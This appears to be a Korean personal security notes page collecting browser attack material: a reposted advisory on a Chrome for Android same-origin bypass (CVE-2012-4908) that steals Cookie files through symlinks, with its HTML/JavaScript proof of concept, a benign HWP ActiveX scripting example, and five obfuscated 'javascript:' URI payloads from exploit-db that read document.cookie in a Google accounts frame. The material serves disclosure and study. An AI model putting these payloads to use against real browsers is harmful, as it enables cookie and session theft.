applicationlayer

DllHijackAuditor.zip

dll hajacking에 취약한지 점검

출처:http://securityxploded.com/dllhijackauditor.php

재밌네

window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf

출처: http://packetstormsecurity.com/files/119303/androidchrome-bypass.txt

CVE Number:         CVE-2012-4908

Title:              Chrome for Android - Bypassing SOP for Local Files By Symlinks

Affected Software:  Confirmed on Chrome for Android v18.0.1025123

Credit:             Takeshi Terada

Issue Status:       v18.0.1025308 was released which fixes this vulnerability

Overview:

  Chrome for Android's Same-Origin Policy for local files (file: URI) can be

  bypassed by using symbolic links. It results in theft of Chrome's private

  files by malicious Android apps.

Details:

  Chrome for Android seems to forbid a local file to read another file,

  except for the originating file itself.

  http://code.google.com/p/chromium/issues/detail?id=37586

  However, it is possible to circumvent the restriction by a trick using

  symbolic link.

  This issue enables malicious Android apps to steal Chrome's private

  files such as Chrome's Cookie file, bookmark file, and so on.

  As an example, steps to steal Chrome's Cookie file are described below:

  1. An attacker's app creates a malicious HTML file, and makes Chrome load

     its URL with file: URI. The malicious HTML contains JavaScript code

     which, a few seconds later, tries to read the content of same URL with

     the malicious HTML itself via XMLHttpRequest.

     <body>

     <u>Wait a few seconds.</u>

     <script>

     function doitjs() {

       var xhr = new XMLHttpRequest;

       xhr.onload = function() {

         alert(xhr.responseText);

       };

       xhr.open('GET', document.URL);

       xhr.send(null);

     }

     setTimeout(doitjs, 8000);

     </script>

     </body>

  2. Before XHR fires, the attacker's app replaces the malicious

     HTML file with a symlink pointing to Chrome's Cookie file.

  3. When XHR fires, Chrome follows the symlink and provides the

     content of the Chrome's Cookie file to the malicious HTML.

  The attacker's app can also get the content of Chrome's other private

  files in a similar manner.

Proof of Concept:

  HTML/JavaScript is shown above. At present I do not have plans to disclose

  PoC of malicious Android app.

Timeline:

  2012/08/19  Reported to Google security team

  2012/08/25  Re-reported to Chrome security team

  2012/09/12  Vender announced v18.0.1025308

  2013/01/07  Disclosure of this advisory

Recommendation:

  Upgrade to the latest version.

Reference:

  http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html

  https://code.google.com/p/chromium/issues/detail?id=144866

브라우저별 SOP(same origin policy)허용범위

www.abc.net 에 접근 한다고 가정할 경우

ie.

가능 www.abc.net

가능 abc.net

chrome

가능 www.abc.net

가능 abc.net

출처: 한컴 공식 개발문서

스크립트 관련 설정:

1. 도구 -> 환경설정 -> 기타 -> 스크립트 실행 확인

2. 도구 -> 매크로 -> 스크립트 매크로 보안 설정

웹에서 hwp호출예제

<html>
 <script language="jscript">
  var App = new ActiveXObject("HWPFrame.HwpObject.1");  
  function OnChangeCharShape() {
   App.HAction.Run("SelectAll");
   App.HAction.GetDefault("CharShape"
     , App.HParameterSet.HCharShape.HSet);
   App.HParameterSet.HCharShape.FaceNameHangul = "궁서체";
   App.HParameterSet.HCharShape.FaceNameLatin = "궁서체";
   App.HParameterSet.HCharShape.FaceNameHanja = "궁서체";
   App.HParameterSet.HCharShape.FaceNameJapanese = "궁서체";
   App.HParameterSet.HCharShape.FaceNameOther = "궁서체";
   App.HParameterSet.HCharShape.FaceNameSymbol = "궁서체";
   App.HParameterSet.HCharShape.FaceNameUser = "궁서체";
   App.HParameterSet.HCharShape.Height = 4000;
   App.HParameterSet.HCharShape.TextColor = 16737792;
   App.HParameterSet.HCharShape.UnderlineType = 1;
   App.HParameterSet.HCharShape.ShadowType = 1;
   App.HAction.Execute("CharShape"
     , App.HParameterSet.HCharShape.HSet);
   App.HAction.Run("Cancel"); 
  }
 </script language="jscript">
 <body>
  <button onclick="OnChangeCharShape()">  글자 모양 변경 </button>
 </body>
</html>

구글 크롬에서 발견된 동일 근원 정책(Same-Origin Policy) 정책 우회 취약점

SOP가 우회되는 브라우저를 사용하게되면 방문하는 모든 사이트가 XSS에 취약하게 된다.

poc는 다음과 같다. (출처:http://www.exploit-db.com/exploits/12657)
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>